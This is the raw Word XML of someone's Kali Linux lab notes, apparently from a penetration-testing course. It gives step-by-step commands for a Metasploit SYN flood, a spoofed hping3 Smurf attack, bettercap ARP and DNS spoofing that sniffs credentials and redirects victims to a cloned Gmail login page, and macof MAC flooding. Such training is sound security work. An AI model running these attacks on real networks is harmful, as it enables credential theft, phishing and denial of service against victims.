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D0CECE" w:themeColor="background2" w:themeShade="E6"/>
  <w:body>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="green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highlight w:val="green"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Kali :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/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color w:val="auto"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="none"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>: Metasploit :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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>root@kali# msfconsole</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline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</w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3394075" cy="2641600"/>
            <wp:effectExtent l="0" t="0" r="158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18213" r="58392" b="18468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i/>
          <w:iCs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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Msf6 &gt; search synflood </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:i/>
          <w:iCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>(It will show path)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  <w:t>Msf6&gt; use ____path____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  <w:t>Msf6&gt;show options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  <w:t xml:space="preserve">Whats yes is mandotry to setup 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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6639560" cy="1648460"/>
            <wp:effectExtent l="0" t="0" r="889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2555" t="23132" r="14306" b="4015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  <w:t>Msf6&gt; set RHOST 192.168.80.1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  <w:t>Msf6&gt; exploit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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6595110" cy="2192020"/>
            <wp:effectExtent l="0" t="0" r="15240" b="177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19110" t="60698" r="38478" b="10553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  <w:t>Open wireshark and check :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  <w:tab/>
      </w:r>
      <w:r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  <w:t>tcp.port == 80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vertAlign w:val="baseline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5" name="Picture 5" descr="Screenshot (2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9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*************************************-*************************************</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="000000" w:themeColor="text1"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow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8"/>
          <w:szCs w:val="28"/>
          <w:highlight w:val="yellow"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
          <w14:textFill>
            <w14:solidFill>
              <w14:schemeClr w14:val="tx1"/>
            </w14:solidFill>
          </w14:textFill>
        </w:rPr>
        <w:t>Smurf attack :</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>A master through slave will attack on victim and and reply froom victim will also be directed to slave itself , it’s a example of DDOS attack , its is different from zombie as in zombie we have control over machine here we don’t .</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">The difference between smurf and DRDOS is that in DRDOS the attack or packet is amplified wherelse here it is not . </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline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sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">Hping3 --icmp -c 1 --spoof slave ip victim ip /broadcast </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:vertAlign w:val="baseline"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4224020" cy="2447290"/>
            <wp:effectExtent l="0" t="0" r="5080" b="10160"/>
            <wp:docPr id="2" name="Picture 2" descr="smu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mur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28"/>
          <w:vertAlign w:val="baseli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*************************************-*************************************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yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>Poisoning attack :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bidi w:val="0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BetterCAP is a powerful, flexible and portable tool created to</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve"> perform various types of MITM attacks against a network, manipulate HTTP, HTTPS and TCP traffic in realtime, sniff for credentials </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:bidi w:val="0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yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>ARP spoofing :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 xml:space="preserve">Attacker will poison the victim memory , we will tell the victim that attacker Is the gateway hence data from victim will go through attacker , example of MIMT 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Victim : 128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Attacker : 143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Gateway 192.168.80.2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 xml:space="preserve">$sudo apt-get install ca-certificates libnetfilter-queue-dev libpcap-dev unzip wget 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$wget http://192.168.1.251/sw/va_pt/Spoofing/bettercap_linux_amd64_v2.28.zip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$unzip bettercap_linux_amd64_v2.28.zip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lang w:val="en-US"/>
        </w:rPr>
        <w:t xml:space="preserve">                            </w:t>
      </w:r>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4596130" cy="1758950"/>
            <wp:effectExtent l="0" t="0" r="13970" b="12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t="34434" r="18584" b="10162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$./bettercap --version</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:num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 xml:space="preserve">.cap -&gt; caplet file : it’s a file which consists of command and will be executed similar to bash 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$sudo nano spoof.cap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  <w:t>net.probe on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  <w:t>set arp.spoof.fullduplex true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  <w:t xml:space="preserve">set arp.spoof.targets ip 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  <w:t>arp.spoof on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  <w:t>set net.sniff.local true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  <w:t>net.sniff on</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:ind w:left="1440" w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3765550" cy="2110105"/>
            <wp:effectExtent l="0" t="0" r="6350" b="444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r="61707" b="6383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$sudo ./bettercap -iface ens33 -caplet spoof.cap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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6635750" cy="3730625"/>
            <wp:effectExtent l="0" t="0" r="12700" b="317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Open Windows access any page with HTTP and insert unam and pwd it shall be visible here.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/>
      </w:pPr>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="6646545" cy="1753870"/>
            <wp:effectExtent l="0" t="0" r="1905" b="1778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rcRect t="35353" r="2699" b="1763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**************************************-************************************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yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>DNS Spoofing :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 xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numPr>
        <w:ind w:firstLine="720" w:firstLineChars="0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bookmarkStart w:id="0" w:name="_GoBack"/>
      <w:bookmarkEnd w:id="0"/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net.probe on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set arp.spoof.fullduplex true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 xml:space="preserve">set arp.spoof.targets ip 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arp.spoof on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  <w:t>set net.sniff.local true</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="0"/>
        </w:numP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  <w:t>net.sniff on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set dns.sniff.all true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  <w:t xml:space="preserve">set dns.spoof.domains </w:t>
      </w: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 xml:space="preserve">any domain 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ab/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dns.spoof on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ind w:left="720" w:leftChars="0" w:firstLine="720" w:firstLineChars="0"/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4265930" cy="2747645"/>
            <wp:effectExtent l="0" t="0" r="1270" b="146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rcRect r="61340" b="55711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 xml:space="preserve">$sudo git clone </w:t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fldChar w:fldCharType="begin"/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instrText xml:space="preserve"> HYPERLINK "https://github.com/Vamsheeth/Gmail-Login" </w:instrText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fldChar w:fldCharType="separate"/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="5"/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https://github.com/Vamsheeth/Gmail-Login</w:t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fldChar w:fldCharType="end"/>
      </w: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 xml:space="preserve">  /var/www/html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$sudo ./bettercap -iface ens33 -caplet spoof.cap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yellow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yellow"/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:t>MAC flooding  :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It will flood mac in CAM table (content addresable memory )that switch will start behaving as hub hence we will have data ,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 xml:space="preserve">kali $ macof -I </w:t>
      </w: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interface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Debian :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$sudo apt-get install dnsiff</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:jc w:val="both"/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 xml:space="preserve">$macof -I </w:t>
      </w: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interface</w:t>
      </w:r>
    </w:p>
    <w:sectPr>
      <w:pgSz w:w="11906" w:h="16838"/>
      <w:pgMar w:top="720" w:right="720" w:bottom="720" w:left="720" w:header="720" w:footer="720" w:gutter="0"/>
      <w:pgBorders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8C5A05"/>
    <w:rsid w:val="26D3191E"/>
    <w:rsid w:val="31A71AC3"/>
    <w:rsid w:val="32A25901"/>
    <w:rsid w:val="3505299E"/>
    <w:rsid w:val="35C0465E"/>
    <w:rsid w:val="3A232A5F"/>
    <w:rsid w:val="49C51095"/>
    <w:rsid w:val="5AEA4836"/>
    <w:rsid w:val="5B501818"/>
    <w:rsid w:val="5DA57F32"/>
    <w:rsid w:val="5EE66340"/>
    <w:rsid w:val="601A2EBA"/>
    <w:rsid w:val="62A415ED"/>
    <w:rsid w:val="67115625"/>
    <w:rsid w:val="713F665A"/>
    <w:rsid w:val="77D16EA3"/>
    <w:rsid w:val="7B8C5A05"/>
    <w:rsid w:val="7D042C28"/>
    <w:rsid w:val="7D1E0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80</TotalTime>
  <ScaleCrop>false</ScaleCrop>
  <LinksUpToDate>false</LinksUpToDate>
  <CharactersWithSpaces>0</CharactersWithSpaces>
  <Application>WPS Office_11.2.0.11213_F1E327BC-269C-435d-A152-05C5408002CA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2023-07-09T12:42:00Z</dcterms:created>
  <dc:creator>Omkar Gadre</dc:creator>
  <cp:lastModifiedBy>Omkar Gadre</cp:lastModifiedBy>
  <cp:lastPrinted>2023-07-10T15:16:00Z</cp:lastPrinted>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-07-11T17:03:03Z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1033-11.2.0.11213</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="ICV">
    <vt:lpwstr>BA36F4F11D644D358A6785EA46B90B58</vt:lpwstr>
  </property>
</Properties>
</file>